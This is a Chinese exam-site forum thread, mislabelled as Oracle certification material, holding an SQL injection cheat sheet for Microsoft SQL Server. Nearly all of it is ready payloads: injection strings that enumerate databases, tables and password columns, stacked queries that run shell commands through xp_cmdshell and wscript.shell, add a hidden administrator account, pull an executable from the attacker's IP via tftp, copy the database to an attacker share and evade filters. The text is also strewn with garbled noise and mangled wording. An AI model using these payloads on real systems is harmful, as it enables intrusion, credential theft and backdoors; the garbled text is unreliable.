设为首页收藏本站
开启辅助访问 切换到窄版

a我考网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

我考网»我考网社区 计算机考试 Oracle认证 oracle认证考试SQL注射语句解析(二)
返回列表 发新帖
查看: 103|回复: 1

[综合] oracle认证考试SQL注射语句解析(二)

[复制链接]
会计考友
发表于 2012-8-4 13:54:49 | 显示全部楼层 |阅读模式
建树一个虚拟目录E盘:
/ N8 [! O3 B3 A- s5 v;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod
$ t% k2 O' Q1 P, Y8 t9 P8 x% w@o, ‘run’, NULL,‘ cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w “默认Web站点”
1 n0 a+ n. p* w; r- g- P# i2 `-v “e”,“e:\”’--( o  H. F8 x7 s( J
访谒属性:(配合写入一个webshell)
- z7 M4 o3 F; ?& P6 V% |( ?declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod7 J6 {; m# r8 b6 u; }6 w
@o, ‘run’, NULL,‘ cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a1 g! a, q0 ]) h" Y
w3svc/1/ROOT/e +browse’
8 B4 @1 V* X8 ^0 A. G- @; S* i7 L5 J爆库 非凡技巧::\=‘\’ 或者把/和\ 改削%5提交3 j5 }. w- w: u. I" h1 z3 G
若何获得SQLSERVER某个数据库中所有表的表名?
$ X  a3 g  L2 Y& v; H--------------------------------------------------------------------------------
2 T: p( a8 I3 B2 W7 \# n用户表:
+ e1 |' v2 D* [8 ]select name from sysobjects where xtype = ‘U’;
- t5 L' H9 y  x( [" c. Y5 W系统表:
4 h9 D& g3 q3 K9 n; n& D# K1 Dselect name from sysobjects where xtype = ‘S’;6 p" J% Q' |' ]4 p+ E6 f5 l
所有表:
! E. ]# N' s3 D7 c9 Hselect name from sysobjects where xtype = ‘S’ or xtype = ‘U’;
- o' L2 |+ f$ X: L/ A--------------------------------------------------------------------------------3 y% y9 _0 `: Y) |4 j. j
and 0《》(select top 1 paths from newtable)--! p* P8 R& _/ a
获得库名(从1到5都是系统的id,6以上才可以判定)
# z2 Y3 v  w/ [and 1=(select name from master.dbo.sysdatabases where dbid=7)--+ T) n. Q6 l  u* G* z+ I/ t' W/ j  g
and 0《》(select count(*) from master.dbo.sysdatabases where name》1 and
9 b: Z5 _2 Z0 L1 Z0 {- w; ]- S3 ^dbid=6)
1 Q. k* \3 o. f$ G依次提交 dbid = 7,8,9.。。. 获得更多的数据库名
/ s/ q" W- H2 ?and 0《》(select top 1 name from bbs.dbo.sysobjects where xtype=‘U’) 暴到一个表0 X- ~$ K. O/ y. I+ @4 \- _
假设为 admin/ }* J* L7 ]' @1 B0 _# d0 {
and 0《》(select top 1 name from bbs.dbo.sysobjects where xtype=‘U’ and name
1 l$ f7 B# B: P- Z  N' |not in (‘Admin’)) 来获得其他的表。
4 l# ]  N, N) rand 0《》(select count(*) from bbs.dbo.sysobjects where xtype=‘U’ and
+ V* s& q+ `7 L1 w* s4 q) aname=‘admin’
8 }8 H, L5 ~6 |' g2 u! ^3 q3 @and uid》(str(id))) 暴到UID的数值假设为18779569 uid=id  h6 W9 \  V9 V8 @& S  D
and 0《》(select top 1 name from bbs.dbo.syscolumns where id=18779569)/ x/ v* r" T" ]  S' B6 `) ~
获得一个admin的一个字段,假设为 user_id
; f! E  w1 g6 K# Z( ~5 B7 ?and 0《》(select top 1 name from bbs.dbo.syscolumns where id=18779569 and: D/ T: d" M  `& W8 K5 Y! n
name not in
" m/ S% W4 |2 k! o( ~(‘id’,。。.)) 来暴出其他的字段
+ u" V: z+ }; j: jand 0《(select user_id from BBS.dbo.admin where username》1) 可以获得用户名
) H2 \& Q0 ]7 `2 @: t/ b6 L依次可以获得密码。。。。。假设存在user_id username ,password 等字段& R; x$ e4 |" s; j
and 0《》(select count(*) from master.dbo.sysdatabases where name》1 and& `. T% H$ Y* W; w) \: d
dbid=6)
% ^9 p5 \2 C8 X' u2 ?- H" j- mand 0《》(select top 1 name from bbs.dbo.sysobjects where xtype=‘U’) 获得表名
1 A# u# `( N, U7 {" M2 a' _1 F1 Yand 0《》(select top 1 name from bbs.dbo.sysobjects where xtype=‘U’ and name
+ x) F( g6 |& `+ j9 v, {# pnot in(‘Address’))
% G. ]; p! U0 A' R; j. f6 Nand 0《》(select count(*) from bbs.dbo.sysobjects where xtype=‘U’ and3 a  }; j( H# f0 G% a& s
name=‘admin’ and uid》(str(id))) 判定id值2 t0 Q9 ^7 e$ a, }
and 0《》(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
8 j. |; L3 W0 m& X' M0 k* T?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin* z1 z7 W/ G7 r4 k
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin; G: d" b4 l6 M8 q1 Q: B
! g+ p7 z; T: j: y% B
(union,access也好用)
回复

使用道具 举报

会计考友
 楼主| 发表于 2012-8-4 13:54:50 | 显示全部楼层

oracle认证考试SQL注射语句解析(二)

</p>获得WEB路径
: g. R2 I& n- w;create table [dbo]。[swap] ([swappass][char](255));--
, G0 s9 H2 ~# I$ s8 Cand (select top 1 swappass from swap)=1--, @6 Q4 t8 S9 d# n& g1 c3 ~
;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare; ?( e) i; F; }, a0 j7 K0 M
@test varchar(20) exec master..xp_regread @rootkey=‘HKEY_LOCAL_MACHINE’,
  `& V# s1 }, ~6 X! k: z@key=‘SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\’,) M0 O) m+ J5 }; m1 s
@value_name=‘/’, values=@test OUTPUT insert into paths(path)
, Y5 ^! Y* Y& q. N7 g( ]# R  u$ jvalues(@test)--5 [& E2 Y. ~. ~. m( E5 w
;use ku1;--* j+ Q6 ?3 g" w; d. M6 V+ p+ ~
;create table cmd (str image);-- 成立image类型的表cmd
( m7 t/ w$ I2 U8 ^# W' B3 C存在xp_cmdshell的测试过程:8 f. Y. J$ g1 z% R9 U
;exec master..xp_cmdshell ‘dir’* v5 Q1 f4 s1 u" K8 U$ n
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
+ ]: J" P% u* [; C;exec master.dbo.sp_password null,jiaoniang$,1866574;--3 i5 L7 @0 E2 k* v0 c) x+ x
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--" z& S- m* ]: X, a2 ?
;exec master.dbo.xp_cmdshell ‘net user jiaoniang$ 1866574 /workstations:*
1 |: S  `( x, e/times:all /passwordchg:yes /passwordreq:yes /active:yes /add’;--
- P: }6 X* j% i4 d+ D9 {( B;exec master.dbo.xp_cmdshell ‘net localgroup administrators jiaoniang$7 V  c8 P* \/ S) ^8 q
/add’;--: ~1 k$ E$ O' j# A
exec master..xp_servicecontrol ‘start’, ‘schedule’ 启动处事
; u& z' F) a4 Q9 G; xexec master..xp_servicecontrol ‘start’, ‘server’' ~0 L" t3 M9 O  q7 Q
; DECLARE @shell INT EXEC SP_OACreate ‘wscript.shell’,@shell OUTPUT EXEC' @* m3 P( S. N* o5 E) r4 K; M4 e
SP_OAMETHOD @shell,‘run’,null, ‘C:\WINNT\system32\cmd.exe /c net user
1 O2 g3 J; F: R0 O$ jjiaoniang$ 1866574 /add’
) O3 }: @9 V6 w3 x% Y;DECLARE @shell INT EXEC SP_OACreate ‘wscript.shell’,@shell OUTPUT EXEC9 q! ~5 a; t1 ]# k( w
SP_OAMETHOD @shell,‘run’,null, ‘C:\WINNT\system32\cmd.exe /c net- ^8 o$ }" q1 S4 R* J: V& v3 i
localgroup administrators jiaoniang$ /add’6 G$ W9 o0 T$ ?4 |. X
‘; exec master..xp_cmdshell ’tftp -i youip get file.exe‘-- 操作TFTP上传文件! I, |0 w% S2 j3 I
;declare @a sysname set @a=’xp_‘+’cmdshell‘ exec @a ’dir c:\‘
5 |, ?! F& Q, d, s- b3 i;declare @a sysname set @a=’xp‘+’_cm’+’dshell‘ exec @a ’dir c:\‘
3 N. ^1 `( f$ w/ H. I;declare @a;set @a=db_name();backup database @a to
, ~, V6 ?# O# w4 Q- mdisk=’你的IP你的共享目录bak.dat‘6 H9 j% d0 Z  v$ P
如不美观被限制则可以。
2 t% ?+ u3 n' ^7 P2 G' iselect * from openrowset(’sqloledb‘,’server‘;’sa‘;’‘,’select ‘’OK!‘’ exec
1 N$ m; J1 Q6 Nmaster.dbo.sp_addlogin hax‘), X3 T3 m' [; I: F
发芽机关:' f. K' a$ Z1 I6 f8 l3 p7 O- }) m. X
Select * FROM news Where id=。。. AND topic=。。. AND 。。.。。2 R) B3 E; a4 c# r- U) T
admin’and 1=(select count(*) from [user] where username=‘victim’ and6 t- b) A! Z9 W( b
right(left(userpass,01),1)=‘1’) and userpass 《》‘
; g- P/ v6 k, f0 R, tselect 123;--
/ C6 S: i  b" |' J# ?8 C; _4 O;use master;--, j( C. E! Q8 v7 c
:a’ or name like ‘fff%’;-- 显示有一个叫ffff的用户哈。$ g* ?1 n. V  _  \9 Z) j
and 1《》(select count(email) from [user]);--
& L3 Z3 ^3 D( G# L& h/ z;update [users] set email=(select top 1 name from sysobjects where
0 `0 b2 \6 z7 `7 {$ t( [1 E0 Gxtype=‘u’ and status》0) where name=‘ffff’;--
; P% f" ?; H9 Z0 ?" s;update [users] set email=(select top 1 id from sysobjects where xtype=‘u’
4 ~2 ^: E0 v6 C/ c' }and name=‘ad’) where name=‘ffff’;--
/ B$ G: z0 C, n7 y4 G) k, w3 A‘;update [users] set email=(select top 1 name from sysobjects where7 D1 J! \: W7 u+ S; E7 H
xtype=’u‘ and id》581577110) where name=’ffff‘;--
& R  P% {2 \% p- x( o* y1 \$ x’;update [users] set email=(select top 1 count(id) from password) where- E1 L" b/ W. h
name=‘ffff’;--
# C3 ]# S0 f6 m5 V& k& t$ e‘;update [users] set email=(select top 1 pwd from password where id=2)
% h/ @4 B* ~* o: i- Z# W3 q9 X0 Twhere name=’ffff‘;--
: O/ h+ K! u- P0 y’;update [users] set email=(select top 1 name from password where id=2)
  R8 s4 g  P8 J( I) Hwhere name=‘ffff’;--
$ u. X; S( ~$ V' a+ w! c膳缦沔的语句是获得数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Woexam.Com ( 湘ICP备18023104号 )

GMT+8, 2024-5-14 22:49 , Processed in 0.189067 second(s), 23 queries .

Powered by Discuz! X3.4 Licensed

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表